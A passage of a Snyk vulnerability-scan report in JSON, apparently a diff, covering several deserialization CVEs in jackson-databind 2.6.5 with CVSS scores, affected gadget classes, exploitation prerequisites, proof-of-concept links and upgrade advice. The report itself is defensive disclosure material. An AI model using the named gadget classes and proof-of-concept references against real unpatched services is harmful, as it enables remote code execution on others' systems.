"maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2020-12-27T17:34:55Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:51:23.852735Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5", - "severityWithCritical": "high" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056414", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.9.10.8)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.9.10.8" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.9.10.8)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/3e8fa3beea49ea62109df9e643c9cb678dabdde1", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2997", - "title": "GitHub Issue" - }, - { - "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", - "title": "Medium Article" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:51:01.748169Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:51:23.768509Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:59:37.093517Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:01.748169Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:23.768509Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.apache.tomcat.dbcp.dbcp.datasources.SharedPoolDataSource`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/3e8fa3beea49ea62109df9e643c9cb678dabdde1)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2997)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", - "epssDetails": { - "percentile": "0.66225", - "probability": "0.00262", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-36187" - ], - "CWE": [ - "CWE-502" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2021-01-07T12:47:33.579319Z", - "functions_new": [ - { - "version": [ - "[,2.9.10.8)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2021-01-07T12:44:41Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2021-01-07T16:40:33.970819Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:51:23.768509Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5", - "severityWithCritical": "high" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056416", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.9.10.8)" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [ - "2.9.10.8" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.9.10.8)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2998", - "title": "GitHub Issue" - }, - { - "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", - "title": "Medium Article" - }, - { - "url": "https://github.com/Al1ex/CVE-2020-36184", - "title": "PoC" - } - ], - "cvssDetails": [ - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:48:47.820867Z" - }, - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:51:24.700251Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:59:37.169091Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:48:47.820867Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:24.700251Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.apache.tomcat.dbcp.dbcp2.datasources.PerUserPoolDataSource`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2998)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [PoC](https://github.com/Al1ex/CVE-2020-36184)\n", - "epssDetails": { - "percentile": "0.66225", - "probability": "0.00262", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-36184" - ], - "CWE": [ - "CWE-502" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2021-01-07T13:02:15.197495Z", - "functions_new": [ - { - "version": [ - "[,2.9.10.8)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2021-01-07T13:00:25Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2021-01-07T16:40:33Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:51:24.700251Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5", - "severityWithCritical": "high" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056417", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.9.10.8)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.9.10.8" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.9.10.8)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2997", - "title": "GitHub Issue" - }, - { - "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", - "title": "Medium Article" - } - ], - "cvssDetails": [ - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:51:23.757857Z" - }, - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:51:24.695573Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:59:37.214306Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:23.757857Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:24.695573Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.apache.tomcat.dbcp.dbcp.datasources.PerUserPoolDataSource`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2997)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", - "epssDetails": { - "percentile": "0.66225", - "probability": "0.00262", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-36186" - ], - "CWE": [ - "CWE-502" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2021-01-07T13:05:16.831143Z", - "functions_new": [ - { - "version": [ - "[,2.9.10.8)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2021-01-07T13:00:26Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2021-01-07T16:40:34.206083Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:51:24.695573Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5", - "severityWithCritical": "high" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056418", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.9.10.8)" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [ - "2.9.10.8" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.9.10.8)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/Al1ex/CVE-2020-36179", - "title": "Al1ex's Poc" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/3004", - "title": "GitHub Issue" - }, - { - "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", - "title": "Medium Article" - } - ], - "cvssDetails": [ - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:51:23.867743Z" - }, - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:51:24.705041Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:59:37.249724Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:23.867743Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:24.705041Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.apache.commons.dbcp2.cpdsadapter.DriverAdapterCPDS`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [Al1ex's Poc](https://github.com/Al1ex/CVE-2020-36179)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/3004)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", - "epssDetails": { - "percentile": "0.66225", - "probability": "0.00262", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-36180" - ], - "CWE": [ - "CWE-502" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2021-01-07T13:08:29.105792Z", - "functions_new": [ - { - "version": [ - "[,2.9.10.8)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2021-01-07T13:05:51Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2021-01-07T16:40:34Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:51:24.705041Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5", - "severityWithCritical": "high" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056419", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.9.10.8)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.9.10.8" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.9.10.8)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/issues/3003", - "title": "GitHub Issue" - }, - { - "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", - "title": "Medium Article" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:49:18.170866Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:51:23.831271Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:59:37.268380Z" - }, - { - "type": "secondary", - "vector": 